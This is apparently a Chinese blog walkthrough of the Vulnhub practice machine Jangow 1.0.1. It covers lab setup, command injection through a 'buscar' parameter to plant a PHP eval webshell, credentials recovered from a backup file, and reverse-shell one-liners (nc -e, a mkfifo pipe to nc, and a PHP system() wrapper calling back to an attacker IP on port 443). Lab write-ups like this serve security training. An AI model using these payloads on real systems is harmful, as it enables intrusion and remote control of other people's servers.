Vulnhub靶机:JANGOW_ 1.0.1

目录

前言:

一、安装虚拟机Jangow:1.0.1靶机

二、Web部分


前言:

难度:简单,本文使用VirtualBox打开,下载地址:

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

一、安装虚拟机Jangow:1.0.1靶机

1.选择下载的Jangow: 1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住的路径用完直接删。

  1. 靶机和kali的网络都设置成仅主机模式
  1. 显存改到128或256都可以。

4.打开虚拟机

二、Web部分

1.打开虚拟机后看到IP为192.168.56.118,直接浏览器访问。

  1. 点击site跳转到一个网站
  1. 用kali扫描下目录,同时前端页面点点点,看下功能。

4.发现wordpress地址,但未发现后台登录地址,没用,但是前端我们随便点点的时候发现一个可以传参的接口,并且可利用。

5.直接一句话上传,用蚁剑连接。

复制代码
?buscar=echo '<?php @eval($_POST['cmd']);?> ' > 666.php

6.先翻翻看,发现了wordpress的账号密码,先记录下备用。

7.在HTML下发现了.backup文件,里面包含了账号密码,记录备用。

8.尝试登录frp,使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的jangow01/abygurl69,可以登陆,翻看下没有什么有用的信息。

  1. 常规反弹shell失败,可能是nc 不支持 -e 参数,这个时候可以有两种解决方式:

第一种是使用其他的nc版本如下所示:

nc.traditional <your_vps> 1024 -e /bin/sh

  1. 第二种就是使用 mkfifo 命令创建命名管道反弹shell:

mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f

  1. 本文使用第二种,然后访问浏览器触发式反弹shell,先使用蚁剑在/var/www/html/site/下面新建78.php文件,然后输入下方内容,注意ip换成自己ip的,另外该靶机只能用443端口。

    <?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f");?>
相关推荐
pencek10 小时前
HakcMyVM-Slackware
网络安全
X7x513 小时前
终端防护平台(EPP):企业安全的“数字护城河“
网络安全·网络攻击模型·安全威胁分析·安全架构·epp
汤愈韬14 小时前
防火墙主备备份的非VRRP的三种模式
网络·网络安全·security
Chockmans15 小时前
春秋云境CVE-2022-32991(手注和sqlmap)保姆级教学
数据库·安全·web安全·网络安全·oracle·春秋云境·cve-2022-32991
云安全助手18 小时前
中小企业上云指南:如何用云服务器搭建安全稳定的办公系统
网络安全
其实防守也摸鱼19 小时前
upload-labs靶场的pass-2~12的解题步骤及原理讲解
笔记·安全·web安全·网络安全·教程·web·工具
HackTwoHub19 小时前
网络设备基线检查AI工具、内置专业基线库批量配置合规检测、自动生成安全整改报告
人工智能·安全·web安全·网络安全·系统安全·安全架构
NOVAnet202320 小时前
SD-WAN 在芯片跨国研发场景中的技术能力与部署实践
分布式·网络安全·sd-wan·网络服务·全球组网
深邃-20 小时前
【Web安全】-计算机网络协议(2):请求方法,头部字段,DNS协议详解
linux·网络·网络协议·计算机网络·安全·web安全·网络安全
谪星·阿凯1 天前
内网隧道与代理实战博客
网络安全